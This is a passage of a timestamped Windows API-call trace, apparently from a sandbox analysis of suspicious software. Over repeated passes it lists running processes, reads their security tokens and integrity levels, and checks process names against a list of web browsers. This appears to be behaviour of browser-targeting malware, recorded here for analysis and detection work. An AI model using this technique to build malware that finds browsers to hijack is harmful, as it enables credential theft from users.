returned 0x0 [0610.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0610.783] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0610.783] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0610.783] GetLastError () returned 0x7a [0610.783] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0610.783] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0610.784] CloseHandle (hObject=0x668) returned 1 [0610.784] CloseHandle (hObject=0x298) returned 1 [0610.784] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0610.784] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0610.784] GetLastError () returned 0x7a [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0610.784] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0610.784] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0610.784] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0610.784] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0610.784] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0610.784] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0610.784] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0610.784] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0610.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0610.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0610.784] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0610.784] GetLastError () returned 0x7a [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0610.784] CloseHandle (hObject=0x668) returned 1 [0610.784] CloseHandle (hObject=0x298) returned 1 [0610.784] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0610.784] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0610.784] GetLastError () returned 0x7a [0610.784] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0610.784] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0610.784] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0610.785] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0610.785] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0610.785] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0610.785] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0610.785] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0610.785] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0610.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0610.785] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0610.785] GetLastError () returned 0x7a [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0610.785] CloseHandle (hObject=0x668) returned 1 [0610.785] CloseHandle (hObject=0x298) returned 1 [0610.785] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0610.785] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0610.785] GetLastError () returned 0x7a [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0610.785] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0610.785] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0610.785] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0610.785] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0610.785] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0610.785] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0610.785] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0610.785] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0610.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0610.785] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0610.785] GetLastError () returned 0x7a [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0610.785] CloseHandle (hObject=0x668) returned 1 [0610.785] CloseHandle (hObject=0x298) returned 1 [0610.785] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0610.785] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0610.785] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0610.786] GetLastError () returned 0x7a [0610.786] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0610.786] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0610.786] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0610.786] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0610.786] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0610.786] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0610.786] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0610.786] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0610.786] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0610.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0610.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0610.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0610.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0610.786] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0610.786] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0610.786] GetLastError () returned 0x7a [0610.786] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0610.786] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0610.786] CloseHandle (hObject=0x668) returned 1 [0610.786] CloseHandle (hObject=0x298) returned 1 [0610.786] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0610.786] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0610.786] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0610.786] GetLastError () returned 0x7a [0610.786] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0610.786] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0610.786] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0610.786] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0610.786] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0610.786] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0610.786] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0610.786] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0610.786] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0610.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0610.786] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0610.787] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0612.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9488) returned 0xc0000004 [0612.792] VirtualAlloc (lpAddress=0x0, dwSize=0xa488, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0612.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa488, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0612.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0612.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0612.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0612.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0612.795] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0612.796] GetLastError () returned 0x7a [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0612.796] CloseHandle (hObject=0x668) returned 1 [0612.796] CloseHandle (hObject=0x298) returned 1 [0612.796] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0612.796] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0612.796] GetLastError () returned 0x7a [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0612.796] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0612.796] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0612.796] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0612.796] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0612.796] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0612.796] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0612.796] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0612.796] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0612.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0612.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0612.796] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0612.796] GetLastError () returned 0x7a [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0612.796] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0612.796] CloseHandle (hObject=0x668) returned 1 [0612.796] CloseHandle (hObject=0x298) returned 1 [0612.796] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0612.797] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0612.797] GetLastError () returned 0x7a [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0612.797] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0612.797] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0612.797] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0612.797] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0612.797] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0612.797] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0612.797] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0612.797] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0612.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0612.797] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0612.797] GetLastError () returned 0x7a [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0612.797] CloseHandle (hObject=0x668) returned 1 [0612.797] CloseHandle (hObject=0x298) returned 1 [0612.797] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0612.797] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0612.797] GetLastError () returned 0x7a [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0612.797] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0612.797] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0612.797] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0612.797] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0612.797] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0612.797] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0612.797] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0612.797] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0612.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0612.797] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0612.797] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, 